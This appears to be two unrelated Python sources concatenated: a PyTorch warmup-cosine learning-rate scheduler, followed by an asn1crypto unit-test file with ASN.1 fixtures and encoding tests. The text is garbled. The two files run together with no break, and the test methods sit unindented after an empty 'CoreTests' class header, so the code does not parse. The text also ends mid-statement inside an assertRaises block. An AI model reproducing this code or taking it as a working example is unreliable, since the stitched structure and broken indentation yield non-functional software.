# NOTE: removed dataset-export artifact (stray markdown table header).
import math
from torch.optim.lr_scheduler import _LRScheduler
from bisect import bisect_right
class WarmupCosineLR(_LRScheduler):
    """Linear warmup followed by per-milestone cosine annealing cycles.

    The schedule has two phases:

    1. Warmup (iterations ``0 .. warmup_iters``): the learning rate ramps
       linearly from ``base_lr * warmup_factor`` up to ``base_lr``.
    2. Cosine cycles: ``milestones`` (iteration counts, increasing and all
       greater than ``warmup_iters``) split the remaining iterations into
       cycles.  Within cycle ``k`` (1-based) the rate follows half a cosine
       from ``base_lr * cycle_decay**(k-1)`` down to ``base_lr * min_ratio``.
       Iterations past the last milestone stay clamped in the final cycle.

    Args:
        optimizer: wrapped ``torch.optim.Optimizer``.
        milestones: increasing iteration counts marking cycle boundaries.
        min_ratio: floor of each cycle as a fraction of ``base_lr``.
        cycle_decay: multiplicative decay of each successive cycle's peak.
        warmup_iters: number of linear-warmup iterations.
        warmup_factor: starting LR fraction at iteration 0.
        last_epoch: index of the last iteration (-1 starts fresh).
    """

    def __init__(self, optimizer, milestones, min_ratio=0., cycle_decay=1.,
                 warmup_iters=1000, warmup_factor=1. / 10, last_epoch=-1):
        # Accept any iterable (the original concatenation failed on tuples).
        milestones = list(milestones)
        if milestones != sorted(milestones):
            raise ValueError(
                "Milestones should be a list of increasing integers. Got {}".format(milestones)
            )
        # The original crashed later (ZeroDivisionError in get_lr) on empty
        # milestones or milestones inside the warmup window; fail fast here.
        if not milestones or milestones[0] <= warmup_iters:
            raise ValueError(
                "Milestones must be non-empty and greater than warmup_iters. Got {}".format(milestones)
            )
        # Prepend warmup_iters so milestones[i-1]..milestones[i] bound cycle i.
        self.milestones = [warmup_iters] + milestones
        self.min_ratio = min_ratio
        self.cycle_decay = cycle_decay
        self.warmup_iters = warmup_iters
        self.warmup_factor = warmup_factor
        super(WarmupCosineLR, self).__init__(optimizer, last_epoch)

    def get_lr(self):
        if self.last_epoch < self.warmup_iters:
            # Linear ramp: warmup_factor -> 1.0 over warmup_iters steps.
            alpha = float(self.last_epoch) / self.warmup_iters
            warmup_factor = self.warmup_factor * (1 - alpha) + alpha
            return [base_lr * warmup_factor for base_lr in self.base_lrs]
        # Which cosine cycle is it?  Clamp so iterations past the last
        # milestone remain in (the end of) the final cycle.
        cycle = min(bisect_right(self.milestones, self.last_epoch), len(self.milestones) - 1)
        # Fractional progress within the current cycle, capped at 1.
        fraction = min(
            (self.last_epoch - self.milestones[cycle - 1]) /
            (self.milestones[cycle] - self.milestones[cycle - 1]),
            1.
        )
        return [
            base_lr * self.min_ratio +
            (base_lr * self.cycle_decay ** (cycle - 1) - base_lr * self.min_ratio) *
            (1 + math.cos(math.pi * fraction)) / 2
            for base_lr in self.base_lrs
        ]
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import unittest
import os
from datetime import datetime, timedelta
from asn1crypto import core, util
from .unittest_data import data_decorator, data
from ._unittest_compat import patch
# Install unittest compatibility shims for older Python versions.
patch()

# On-disk fixture locations used by parse_universal_type().
tests_root = os.path.dirname(__file__)
fixtures_dir = os.path.join(tests_root, 'fixtures')
class NamedBits(core.BitString):
    """BIT STRING fixture with named bits (bit 5 is intentionally unmapped)."""
    _map = {
        0: 'zero',
        1: 'one',
        2: 'two',
        3: 'three',
        4: 'four',
        6: 'six',
        7: 'seven',
    }


class SequenceOfInts(core.SequenceOf):
    """SEQUENCE OF INTEGER fixture."""
    _child_spec = core.Integer


class SequenceAny(core.SequenceOf):
    """SEQUENCE OF ANY fixture."""
    _child_spec = core.Any


class Seq(core.Sequence):
    """Sequence whose 'value' spec is selected by the 'id' OID."""
    _fields = [
        ('id', core.ObjectIdentifier),
        ('value', core.Any),
    ]
    _oid_pair = ('id', 'value')
    _oid_specs = {
        '1.2.3': core.Integer,
        '2.3.4': core.OctetString,
    }


class CopySeq(core.Sequence):
    """Sequence with a nested Seq, used by the copy/mutation tests."""
    _fields = [
        ('name', core.UTF8String),
        ('pair', Seq),
    ]


class NestSeqAny(core.Sequence):
    """OID-switched sequence whose selected spec is itself a Sequence."""
    _fields = [
        ('id', core.ObjectIdentifier),
        ('value', core.Any),
    ]
    _oid_pair = ('id', 'value')
    _oid_specs = {
        '3.4.5': Seq,
    }


class NestSeqExplicit(core.Sequence):
    # NOTE(review): 'value' is declared as NamedBits while _oid_specs maps
    # '3.4.5' to Seq — presumably deliberate for spec-mismatch testing; confirm.
    _fields = [
        ('id', core.ObjectIdentifier),
        ('value', NamedBits),
    ]
    _oid_pair = ('id', 'value')
    _oid_specs = {
        '3.4.5': Seq,
    }


class Enum(core.Enumerated):
    """Two-value ENUMERATED fixture."""
    _map = {
        0: 'a',
        1: 'b',
    }


class ExplicitFieldDefault(core.Sequence):
    """Sequence with an explicitly tagged field that has a default value."""
    _fields = [
        ('bits', NamedBits),
        ('seq', Seq, {'explicit': 2, 'default': {'id': '1.2.3', 'value': 10}}),
    ]


class NumChoice(core.Choice):
    """Integer CHOICE using the new-style tag keyword arguments."""
    _alternatives = [
        ('one', core.Integer, {'explicit': 0}),
        ('two', core.Integer, {'implicit': 1}),
        ('three', core.Integer, {'explicit': 2}),
    ]


class NumChoiceOldApi(core.Choice):
    """Same CHOICE as NumChoice, written with the legacy tag_type/tag API."""
    _alternatives = [
        ('one', core.Integer, {'tag_type': 'explicit', 'tag': 0}),
        ('two', core.Integer, {'tag_type': 'implicit', 'tag': 1}),
        ('three', core.Integer, {'tag_type': 'explicit', 'tag': 2}),
    ]


class SeqChoice(core.Choice):
    """CHOICE over CopySeq using new-style tag keywords."""
    _alternatives = [
        ('one', CopySeq, {'explicit': 0}),
        ('two', CopySeq, {'implicit': 1}),
    ]


class SeqChoiceOldApi(core.Choice):
    """Same CHOICE as SeqChoice, written with the legacy tag_type/tag API."""
    _alternatives = [
        ('one', CopySeq, {'tag_type': 'explicit', 'tag': 0}),
        ('two', CopySeq, {'tag_type': 'implicit', 'tag': 1}),
    ]


class ChoiceChoice(core.Choice):
    """CHOICE whose alternatives are themselves CHOICEs."""
    _alternatives = [
        ('num', NumChoice, {'explicit': 0}),
        ('seq', SeqChoice, {'explicit': 1}),
    ]


class CCSeq(core.Sequence):
    """Sequence wrapping the nested ChoiceChoice."""
    _fields = [
        ('cc', ChoiceChoice)
    ]
class ExplicitField(core.Sequence):
    # NOTE(review): despite the names, this class uses the LEGACY
    # tag_type/tag API and ExplicitFieldOldApi uses the new one — the
    # pair looks swapped; presumably both spellings are still exercised.
    _fields = [
        ('field', NumChoice, {'tag_type': 'explicit', 'tag': 0}),
    ]


class ExplicitFieldOldApi(core.Sequence):
    """Counterpart of ExplicitField (see naming note there)."""
    _fields = [
        ('field', NumChoiceOldApi, {'explicit': 0}),
    ]


class SetTest(core.Set):
    # Fields listed out of tag order on purpose: SET encoding must sort them.
    # NOTE(review): same swapped old/new tag API naming as ExplicitField.
    _fields = [
        ('two', core.Integer, {'tag_type': 'implicit', 'tag': 2}),
        ('one', core.Integer, {'tag_type': 'implicit', 'tag': 1}),
    ]


class SetTestOldApi(core.Set):
    """Counterpart of SetTest using the other tag-keyword spelling."""
    _fields = [
        ('two', core.Integer, {'implicit': 2}),
        ('one', core.Integer, {'implicit': 1}),
    ]


class SetOfTest(core.SetOf):
    """SET OF INTEGER fixture."""
    _child_spec = core.Integer


class ConcatTest(core.Concat):
    """Concatenation of a Seq followed by an Integer."""
    _child_specs = [Seq, core.Integer]


class IntegerConcats(core.Concat):
    """Concatenation of two Integers, used by the strict-parsing test."""
    _child_specs = [core.Integer, core.Integer]


class MyOids(core.ObjectIdentifier):
    """OID fixture with two dotted-to-name mappings."""
    _map = {
        '1.2.3': 'abc',
        '4.5.6': 'def',
    }
class ApplicationTaggedInteger(core.Integer):
    """INTEGER wrapped in an explicit [APPLICATION 10] tag."""
    # This class attribute may be a 2-element tuple of integers,
    # or a tuple of 2-element tuple of integers. The first form
    # will be converted to the second form the first time an
    # object of this type is constructed.
    explicit = ((1, 10), )


class ApplicationTaggedInner(core.Sequence):
    """
    TESTCASE DEFINITIONS EXPLICIT TAGS ::=
    BEGIN
    INNERSEQ ::= SEQUENCE {
    innernumber [21] INTEGER
    }
    INNER ::= [APPLICATION 20] INNERSEQ
    """
    # (1, 20) == explicit [APPLICATION 20]; converted to nested-tuple form on
    # first construction, as described on ApplicationTaggedInteger.
    explicit = (1, 20)
    _fields = [
        ('innernumber', core.Integer, {'explicit': 21}),
    ]


class ApplicationTaggedOuter(core.Sequence):
    """
    OUTERSEQ ::= SEQUENCE {
    outernumber [11] INTEGER,
    inner [12] INNER
    }
    OUTER ::= [APPLICATION 10] OUTERSEQ
    END
    """
    explicit = (1, 10)
    _fields = [
        ('outernumber', core.Integer, {'explicit': 11}),
        ('inner', ApplicationTaggedInner, {'explicit': 12}),
    ]


class SpcPeImageFlags(core.BitString):
    """Authenticode SpcPeImageFlags named BIT STRING."""
    _map = {
        0: "includeResources",
        1: "includeDebugInfo",
        2: "includeImportAddressTable",
    }


class SpcSerializedObject(core.Sequence):
    """Authenticode SpcSerializedObject (classId + opaque data)."""
    _fields = [
        ("classId", core.OctetString),
        ("serializedData", core.OctetString),
    ]


class SpcString(core.Choice):
    """Authenticode SpcString: BMP (unicode) or IA5 (ascii) alternative."""
    _alternatives = [
        ("unicode", core.BMPString, {"implicit": 0}),
        ("ascii", core.IA5String, {"implicit": 1}),
    ]


class SpcLink(core.Choice):
    """Authenticode SpcLink: url, moniker, or file alternative."""
    _alternatives = [
        ("url", core.IA5String, {"implicit": 0}),
        ("moniker", SpcSerializedObject, {"implicit": 1}),
        ("file", SpcString, {"explicit": 2})
    ]


class SpcPeImageData(core.Sequence):
    """Authenticode SpcPeImageData with a defaulted flags field."""
    _fields = [
        ("flags", SpcPeImageFlags, {"default": "includeResources"}),
        ("file", SpcLink, {"explicit": 0})
    ]


class UTF8Sequence(core.Sequence):
    """Single-UTF8String sequence used by the indefinite-length tests."""
    _fields = [
        ("string", core.UTF8String)
    ]


class NestedUTF8Sequence(core.Sequence):
    """UTF8Sequence nested one level deeper."""
    _fields = [
        ("seq", UTF8Sequence)
    ]
@data_decorator
class CoreTests(unittest.TestCase):
def test_large_tag_encode(self):
    """Tag numbers >= 31 must encode with the high-tag-number (multi-byte) form."""
    # https://misc.daniel-marschall.de/asn.1/oid_facts.html
    v = core.Primitive(tag=31, contents=b'')
    self.assertEqual(b'\x1f\x1f\x00', v.dump())
    v = core.Primitive(tag=36, contents=b'')
    self.assertEqual(b'\x1f\x24\x00', v.dump())
    # One extra byte
    v = core.Primitive(
        class_="application",
        method="constructed",
        tag=73,
        contents=b''
    )
    self.assertEqual(b'\x7f\x49\x00', v.dump())
    # Two extra bytes
    v = core.Primitive(
        class_="application",
        method="constructed",
        tag=201,
        contents=b''
    )
    self.assertEqual(b'\x7f\x81\x49\x00', v.dump())
    # Three extra bytes
    v = core.Primitive(
        class_="application",
        method="constructed",
        tag=16384,
        contents=b''
    )
    self.assertEqual(b'\x7f\x81\x80\x00\x00', v.dump())

def test_manual_construction(self):
    """An Asn1Value built from raw class/method/tag parts encodes as given."""
    v = core.Asn1Value(
        class_="application",
        method="constructed",
        tag=1,
        contents=b''
    )
    self.assertEqual(b'\x61\x00', v.dump())

def test_sequence_spec(self):
    """Seq's 'value' spec follows the OID chosen via _oid_pair/_oid_specs."""
    seq = Seq()
    seq['id'] = '1.2.3'
    self.assertEqual(core.Integer, seq.spec('value'))
    seq['id'] = '2.3.4'
    self.assertEqual(core.OctetString, seq.spec('value'))

def test_sequence_of_spec(self):
    """A SequenceOf exposes its child spec via spec()."""
    seq = SequenceAny()
    self.assertEqual(core.Any, seq.spec())

@staticmethod
def compare_primitive_info():
    """(a, b, expected-equality) rows consumed by compare_primitive."""
    return (
        (core.ObjectIdentifier('1.2.3'), core.ObjectIdentifier('1.2.3'), True),
        (core.Integer(1), Enum(1), False),
        # Tagging alone does not affect equality of the same value.
        (core.Integer(1), core.Integer(1, implicit=5), True),
        (core.Integer(1), core.Integer(1, explicit=5), True),
        (core.Integer(1), core.Integer(2), False),
        (core.OctetString(b''), core.OctetString(b''), True),
        (core.OctetString(b''), core.OctetString(b'1'), False),
        (core.OctetString(b''), core.OctetBitString(b''), False),
        (core.ParsableOctetString(b'12'), core.OctetString(b'12'), True),
        (core.ParsableOctetBitString(b'12'), core.OctetBitString(b'12'), True),
        (core.UTF8String('12'), core.UTF8String('12'), True),
        (core.UTF8String('12'), core.UTF8String('1'), False),
        (core.UTF8String('12'), core.IA5String('12'), False),
    )

@data('compare_primitive_info')
def compare_primitive(self, one, two, equal):
    """Equality/inequality of primitive values per the table above."""
    if equal:
        self.assertEqual(one, two)
    else:
        self.assertNotEqual(one, two)
@staticmethod
def integer_info():
    """(native int, DER bytes) pairs for the integer round-trip test."""
    return (
        (0, b'\x02\x01\x00'),
        # Values with the high bit set need a leading zero byte.
        (255, b'\x02\x02\x00\xFF'),
        (128, b'\x02\x02\x00\x80'),
        (127, b'\x02\x01\x7F'),
        (-127, b'\x02\x01\x81'),
        # NOTE(review): duplicate of the previous row — possibly -128
        # (b'\x02\x01\x80') was intended; confirm.
        (-127, b'\x02\x01\x81'),
        (32768, b'\x02\x03\x00\x80\x00'),
        (-32768, b'\x02\x02\x80\x00'),
        (-32769, b'\x02\x03\xFF\x7F\xFF'),
    )

@data('integer_info')
def integer(self, native, der_bytes):
    """Integer round-trips between native value and DER encoding."""
    i = core.Integer(native)
    self.assertEqual(der_bytes, i.dump())
    self.assertEqual(native, core.Integer.load(der_bytes).native)

@staticmethod
def utctime_info():
    """(aware datetime, UTCTime DER bytes) pairs; encoding normalizes to Z."""
    return (
        (datetime(2030, 12, 31, 8, 30, 0, tzinfo=util.timezone.utc), b'\x17\x0D301231083000Z'),
        (datetime(2049, 12, 31, 8, 30, 0, tzinfo=util.timezone.utc), b'\x17\x0D491231083000Z'),
        (datetime(1950, 12, 31, 8, 30, 0, tzinfo=util.timezone.utc), b'\x17\x0D501231083000Z'),
        # A non-UTC offset is converted to UTC when encoding.
        (datetime(2018, 10, 20, 7, 35, 4, tzinfo=util.timezone(timedelta(hours=7, minutes=40))),
         b'\x17\x0D181019235504Z'),
    )

@data('utctime_info')
def utctime(self, native, der_bytes):
    """UTCTime round-trips between aware datetime and DER encoding."""
    u = core.UTCTime(native)
    self.assertEqual(der_bytes, u.dump())
    self.assertEqual(native, core.UTCTime.load(der_bytes).native)

def test_utctime_errors(self):
    """UTCTime rejects naive datetimes and dates outside 1950-2049."""
    with self.assertRaises(ValueError):
        # is not aware
        core.UTCTime(datetime.fromtimestamp(1234567890))
    with self.assertRaises(ValueError):
        # Is pre 1950
        core.UTCTime(datetime(1910, 6, 22, 11, 33, 44, tzinfo=util.timezone.utc))
    with self.assertRaises(ValueError):
        # Is past 2050
        core.UTCTime(datetime(2106, 2, 7, 6, 28, 16, tzinfo=util.timezone.utc))

def test_utctime_copy(self):
    """Copying a UTCTime preserves native value, contents and encoding."""
    a = core.UTCTime(datetime(2019, 11, 11, 17, 45, 18, tzinfo=util.timezone.utc))
    # Ensure _native is set because we want to test copy on the nested timezone object.
    a.native
    b = a.copy()
    self.assertEqual(a.native, b.native)
    self.assertEqual(a.contents, b.contents)
    self.assertEqual(a.dump(), b.dump())
@staticmethod
def generalized_time_info():
    """(BER input, expected datetime, DER re-encoding or None) rows.

    A None DER encoding marks values (naive datetimes, truncated forms)
    that cannot be re-encoded as DER and must raise ValueError.
    """
    def tz(hours, minutes=0):
        return util.create_timezone(timedelta(hours=hours, minutes=minutes))
    return (
        (b'\x18\x1520180405062426.0+0200', datetime(2018, 4, 5, 6, 24, 26, 0, tz(2)), b'\x18\x0f20180405042426Z'),
        (b'\x18\x0f2018062419-1355', datetime(2018, 6, 24, 19, 0, 0, 0, tz(-13, -55)), b'\x18\x0f20180625085500Z'),
        (b'\x18\x0d2018062419-13', datetime(2018, 6, 24, 19, 0, 0, 0, tz(-13)), b'\x18\x0f20180625080000Z'),
        (b'\x18\x0b2018062419Z', datetime(2018, 6, 24, 19, 0, 0, 0, tz(0)), b'\x18\x0f20180624190000Z'),
        (b'\x18\x122018062419.15+0345', datetime(2018, 6, 24, 19, 9, 0, 0, tz(3, 45)), b'\x18\x0f20180624152400Z'),
        (
            # Comma as the decimal separator is valid BER.
            b'\x18\x13201806241957,433+02',
            datetime(2018, 6, 24, 19, 57, 25, 980000, tz(2)),
            b'\x18\x1220180624175725.98Z',
        ),
        (
            b'\x18\x1620180624195724.215999Z',
            datetime(2018, 6, 24, 19, 57, 24, 215999, tz(0)),
            b'\x18\x1620180624195724.215999Z',
        ),
        (
            # Year 0 requires util.extended_datetime.
            b'\x18\x150000022910.31337-0815',
            util.extended_datetime(0, 2, 29, 10, 18, 48, 132000, tz(-8, -15)),
            b'\x18\x1300000229183348.132Z',
        ),
        (b'\x18\x1520180624195724.215999', datetime(2018, 6, 24, 19, 57, 24, 215999), None),
        (b'\x18\x0a2018062419', datetime(2018, 6, 24, 19, 0, 0, 0), None),
    )

@data('generalized_time_info')
def generalized_time(self, ber_bytes, native, der_bytes):
    """GeneralizedTime decodes BER forms and (when possible) re-encodes DER."""
    decoded = core.GeneralizedTime.load(ber_bytes)
    self.assertEqual(decoded.native, native)
    self.assertEqual(decoded.native.tzinfo, native.tzinfo)
    if der_bytes is not None:
        encoded = core.GeneralizedTime(native).dump()
        self.assertEqual(encoded, der_bytes)
        decoded2 = core.GeneralizedTime.load(encoded)
        self.assertEqual(decoded2.native, native)
    else:
        with self.assertRaises(ValueError):
            encoded = core.GeneralizedTime(native).dump()

@staticmethod
def type_info():
    """(fixture filename, spec class, expected native value) rows."""
    return (
        ('universal/object_identifier.der', core.ObjectIdentifier, '1.2.840.113549.1.1.1'),
    )

@data('type_info')
def parse_universal_type(self, input_filename, type_class, native):
    """On-disk DER fixtures parse to the expected native value and re-dump."""
    with open(os.path.join(fixtures_dir, input_filename), 'rb') as f:
        der = f.read()
    parsed = type_class.load(der)
    self.assertEqual(native, parsed.native)
    self.assertEqual(der, parsed.dump(force=True))
def test_int_to_bit_tuple(self):
    """_int_to_bit_tuple converts non-negative ints to fixed-width bit tuples."""
    self.assertEqual((), core._int_to_bit_tuple(0, 0))
    self.assertEqual((0,), core._int_to_bit_tuple(0, 1))
    self.assertEqual((1,), core._int_to_bit_tuple(1, 1))
    self.assertEqual((0, 0), core._int_to_bit_tuple(0, 2))
    self.assertEqual((0, 1), core._int_to_bit_tuple(1, 2))
    self.assertEqual((0, 0, 1), core._int_to_bit_tuple(1, 3))
    self.assertEqual((0, 1, 0), core._int_to_bit_tuple(2, 3))
    self.assertEqual((1, 0, 1), core._int_to_bit_tuple(5, 3))
    with self.assertRaises(ValueError):
        # Value does not fit in the requested width.
        core._int_to_bit_tuple(9, 3)
    with self.assertRaises(ValueError):
        # Negative values are rejected.
        core._int_to_bit_tuple(-9, 5)

@staticmethod
def bit_string_info():
    """(bit tuple, DER bytes) pairs; first content byte is the unused-bit count."""
    return (
        ((0, 1, 1), b'\x03\x02\x05\x60'),
        ((0, 1, 1, 0, 0, 0, 0, 0), b'\x03\x02\x00\x60'),
        ((0, 0, 0, 0, 0, 0, 0, 0), b'\x03\x02\x00\x00'),
        ((0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1), b'\x03\x03\x00\x00\x01'),
    )

@data('bit_string_info')
def bit_string(self, native, der_bytes):
    """BitString round-trips between bit tuples and DER encoding."""
    bs = core.BitString(native)
    self.assertEqual(der_bytes, bs.dump())
    self.assertEqual(native, core.BitString.load(der_bytes).native)

def test_bit_string_load_dump(self):
    """An empty BIT STRING decodes to () and re-dumps byte-identically."""
    bs = core.BitString.load(b'\x03\x01\x00')
    self.assertEqual(tuple(), bs.native)
    self.assertEqual(b'\x03\x01\x00', bs.dump(True))

@staticmethod
def bit_string_error_values():
    """Malformed BIT STRING encodings that must raise ValueError."""
    return (
        # unused bits in empty bit string
        (b'\x03\x01\x05',),
        # too many unused bits
        (b'\x03\x03\x0e\x0c\x00',),
        # chunk with unused bits is not last chunk
        (b'\x23\x80\x03\x02\x01\xfe\x03\x02\x00\x55\x00\x00',),
    )

@data('bit_string_error_values')
def bit_string_errors(self, enc_bytes):
    """Malformed encodings raise when the native value is accessed."""
    with self.assertRaises(ValueError):
        core.BitString.load(enc_bytes).native

def test_cast(self):
    """cast() reinterprets the same contents as another BIT STRING flavor."""
    a = core.OctetBitString(b'\x00\x01\x02\x03')
    self.assertEqual(b'\x00\x01\x02\x03', a.native)
    b = a.cast(core.BitString)
    self.assertIsInstance(b, core.BitString)
    self.assertEqual(
        (
            0, 0, 0, 0, 0, 0, 0, 0,
            0, 0, 0, 0, 0, 0, 0, 1,
            0, 0, 0, 0, 0, 0, 1, 0,
            0, 0, 0, 0, 0, 0, 1, 1
        ),
        b.native
    )
    c = a.cast(core.IntegerBitString)
    self.assertIsInstance(c, core.IntegerBitString)
    # 0x00010203 == 66051
    self.assertEqual(66051, c.native)
def test_load(self):
    """Module-level load() detects the universal type from the tag."""
    i = core.load(b'\x02\x01\x00')
    self.assertIsInstance(i, core.Integer)
    self.assertEqual(0, i.native)

def test_load_wrong_type(self):
    """load() requires bytes, not str."""
    with self.assertRaises(TypeError):
        core.load('\x02\x01\x00')

@staticmethod
def truncated_der_byte_strings():
    """Encodings cut off mid-value that must raise on access."""
    return (
        (b'',),
        (b'\x30',),
        (b'\x30\x03\x02\x00\x02',),
    )

@data('truncated_der_byte_strings')
def truncated(self, der_bytes):
    """Truncated input raises ValueError when native is accessed."""
    with self.assertRaises(ValueError):
        core.load(der_bytes).native

def test_strict(self):
    """strict=True rejects trailing bytes after the value."""
    with self.assertRaises(ValueError):
        core.load(b'\x02\x01\x00\x00', strict=True)

def test_strict_on_class(self):
    """Same trailing-data rejection via a concrete class's load()."""
    with self.assertRaises(ValueError):
        core.Integer.load(b'\x02\x01\x00\x00', strict=True)

def test_strict_concat(self):
    """Trailing data after all Concat children is rejected when strict."""
    with self.assertRaises(ValueError):
        IntegerConcats.load(b'\x02\x01\x00\x02\x01\x00\x00', strict=True)

def test_strict_choice(self):
    """Trailing data after a Choice value is rejected when strict."""
    with self.assertRaises(ValueError):
        NumChoice.load(b'\xA0\x03\x02\x01\x00\x00', strict=True)
    with self.assertRaises(ValueError):
        NumChoiceOldApi.load(b'\xA0\x03\x02\x01\x00\x00', strict=True)

def test_choice_parse_return(self):
    """Choice.parse() re-parses when the cached _parsed is cleared."""
    nc = NumChoice.load(b'\xA0\x03\x02\x01\x00\x00')
    nc._parsed = None
    self.assertEqual(0, nc.parse().native)

def test_sequece_choice_choice(self):
    # NOTE(review): method name typo ("sequece"); renaming would only be
    # cosmetic for test discovery, so it is left as-is.
    """A nested Choice-of-Choice can be constructed from python objects."""
    CCSeq({
        'cc': ChoiceChoice(
            'num',
            NumChoice('one', core.Integer(0))
        )
    })

def test_bit_string_item_access(self):
    """BitString supports item assignment/lookup by bit index."""
    named = core.BitString()
    named[0] = True
    self.assertEqual(False, named[2])
    self.assertEqual(False, named[1])
    self.assertEqual(True, named[0])
@staticmethod
def mapped_bit_string_info():
    """(input, DER bytes, expected native set) rows for NamedBits."""
    return (
        (
            (0, 1, 1),
            b'\x03\x02\x05\x60',
            set(['one', 'two'])
        ),
        (
            # A single zero bit still encodes, but maps to the empty set.
            (0,),
            b'\x03\x01\x00',
            set()
        ),
        (
            # Construction from a set of names is equivalent to bit tuples.
            set(['one', 'two']),
            b'\x03\x02\x05\x60',
            set(['one', 'two'])
        )
    )

@data('mapped_bit_string_info')
def mapped_bit_string(self, input_native, der_bytes, native):
    """NamedBits encodes from tuples/sets and decodes to a name set."""
    named = NamedBits(input_native)
    self.assertEqual(der_bytes, named.dump())
    self.assertEqual(native, NamedBits.load(der_bytes).native)

def test_mapped_bit_string_item_access(self):
    """Named bits are accessible by name."""
    named = NamedBits()
    named['one'] = True
    self.assertEqual(False, named['two'])
    self.assertEqual(True, named['one'])
    self.assertEqual(True, 'one' in named.native)

def test_mapped_bit_string_unset_bit(self):
    """Clearing a named bit removes it from the native set."""
    named = NamedBits(set(['one', 'two']))
    named['one'] = False
    self.assertEqual(True, named['two'])
    self.assertEqual(set(['two']), named.native)

def test_mapped_bit_string_sparse(self):
    """An unmapped bit (index 5) shows up in native by its index."""
    named = NamedBits((0, 0, 0, 0, 0, 1))
    self.assertEqual(False, named['two'])
    self.assertEqual(True, named[5])
    self.assertEqual(True, 5 in named.native)

def test_mapped_bit_string_numeric(self):
    """Setting a mapped bit by index is reflected under its name."""
    named = NamedBits()
    named[1] = True
    self.assertEqual(True, named['one'])
    self.assertEqual(set(['one']), named.native)

def test_get_sequence_value(self):
    """SequenceOf supports indexed access to child values."""
    seq = SequenceOfInts([1, 2])
    self.assertEqual(2, seq[1].native)

def test_replace_sequence_value(self):
    """SequenceOf supports indexed replacement."""
    seq = SequenceOfInts([1, 2])
    self.assertEqual([1, 2], seq.native)
    seq[0] = 5
    self.assertEqual([5, 2], seq.native)

def test_add_to_end_sequence_value(self):
    """Assigning one past the end appends, as does append()."""
    seq = SequenceOfInts([1, 2])
    self.assertEqual([1, 2], seq.native)
    seq[2] = 5
    self.assertEqual([1, 2, 5], seq.native)
    seq.append(6)
    self.assertEqual([1, 2, 5, 6], seq.native)

def test_delete_sequence_value(self):
    """del removes a child from a SequenceOf."""
    seq = SequenceOfInts([1, 2])
    self.assertEqual([1, 2], seq.native)
    del seq[0]
    self.assertEqual([2], seq.native)
def test_sequence_any_asn1value(self):
    """A SequenceOf Any accepts Asn1Value children."""
    seq = SequenceAny()
    seq.append(core.Integer(5))
    self.assertEqual([5], seq.native)

def test_sequence_any_native_value(self):
    """A SequenceOf Any rejects bare native values (type is ambiguous)."""
    seq = SequenceAny()
    with self.assertRaises(ValueError):
        seq.append(5)

def test_copy(self):
    """copy() produces a distinct object with identical contents/encoding."""
    a = core.Integer(200)
    b = a.copy()
    self.assertNotEqual(id(a), id(b))
    self.assertEqual(a.contents, b.contents)
    self.assertEqual(a.dump(), b.dump())

def test_copy_mutable(self):
    """Mutating the original after copy() must not leak into the copy."""
    a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
    # Cache the native representation so it is copied during the copy operation
    a.native
    b = a.copy()
    self.assertNotEqual(id(a), id(b))
    self.assertNotEqual(id(a['pair']), id(b['pair']))
    self.assertEqual(a.contents, b.contents)
    self.assertEqual(a.dump(), b.dump())
    self.assertEqual(a['pair']['value'].native, b['pair']['value'].native)
    a['pair']['value'] = 6
    self.assertNotEqual(a['pair']['value'].native, b['pair']['value'].native)
    a.native['pair']['value'] = 6
    self.assertNotEqual(a.native['pair']['value'], b.native['pair']['value'])
    self.assertNotEqual(a.contents, b.contents)
    self.assertNotEqual(a.dump(), b.dump())

def test_explicit_tag_header(self):
    """The explicit tag wrapper bytes end up in the chosen value's _header."""
    val = NumChoice.load(b'\xa0\x03\x02\x01\x00')
    self.assertEqual(b'\xa0\x03\x02\x01', val.chosen._header)
    self.assertEqual(b'\x00', val.chosen.contents)
    val2 = NumChoiceOldApi.load(b'\xa0\x03\x02\x01\x00')
    self.assertEqual(b'\xa0\x03\x02\x01', val2.chosen._header)
    self.assertEqual(b'\x00', val2.chosen.contents)

def test_explicit_field_default(self):
    """An explicitly tagged field with a default parses when present."""
    val = ExplicitFieldDefault.load(b'\x30\x0f\x03\x02\x06@\xa2\x090\x07\x06\x02*\x03\x02\x01\x01')
    self.assertEqual(set(['one']), val['bits'].native)
    self.assertEqual(
        util.OrderedDict([
            ('id', '1.2.3'),
            ('value', 1)
        ]),
        val['seq'].native
    )

def test_explicit_header_field_choice(self):
    """An explicitly tagged Choice field round-trips byte-identically."""
    der = b'\x30\x07\xa0\x05\xa0\x03\x02\x01\x00'
    val = ExplicitField.load(der)
    self.assertEqual(0, val['field'].chosen.native)
    self.assertEqual(der, val.dump(force=True))
    val2 = ExplicitFieldOldApi.load(der)
    self.assertEqual(0, val2['field'].chosen.native)
    self.assertEqual(der, val2.dump(force=True))

def test_retag(self):
    """retag() returns a new object with the same contents, new tagging."""
    a = core.Integer(200)
    b = a.retag('explicit', 0)
    self.assertNotEqual(id(a), id(b))
    self.assertEqual(a.contents, b.contents)
    self.assertNotEqual(a.dump(), b.dump())

def test_untag(self):
    """untag() strips tagging, changing the encoding but not the contents."""
    a = core.Integer(200, explicit=0)
    b = a.untag()
    self.assertNotEqual(id(a), id(b))
    self.assertEqual(a.contents, b.contents)
    self.assertNotEqual(a.dump(), b.dump())
def test_choice_dict_name(self):
    """A Choice built from a one-key dict selects that alternative."""
    a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
    choice = SeqChoice({'one': a})
    self.assertEqual('one', choice.name)
    with self.assertRaises(ValueError):
        # Empty dict: no alternative selected.
        SeqChoice({})
    with self.assertRaises(ValueError):
        # More than one key is ambiguous.
        SeqChoice({'one': a, 'two': a})
    choice2 = SeqChoiceOldApi({'one': a})
    self.assertEqual('one', choice2.name)
    with self.assertRaises(ValueError):
        SeqChoiceOldApi({})
    with self.assertRaises(ValueError):
        SeqChoiceOldApi({'one': a, 'two': a})

def test_choice_tuple_name(self):
    """A Choice built from a 2-tuple selects that alternative."""
    a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
    choice = SeqChoice(('one', a))
    self.assertEqual('one', choice.name)
    with self.assertRaises(ValueError):
        # A tuple must have exactly two elements.
        SeqChoice(('one',))
    with self.assertRaises(ValueError):
        SeqChoice(('one', a, None))
    choice2 = SeqChoiceOldApi(('one', a))
    self.assertEqual('one', choice2.name)
    with self.assertRaises(ValueError):
        SeqChoiceOldApi(('one',))
    with self.assertRaises(ValueError):
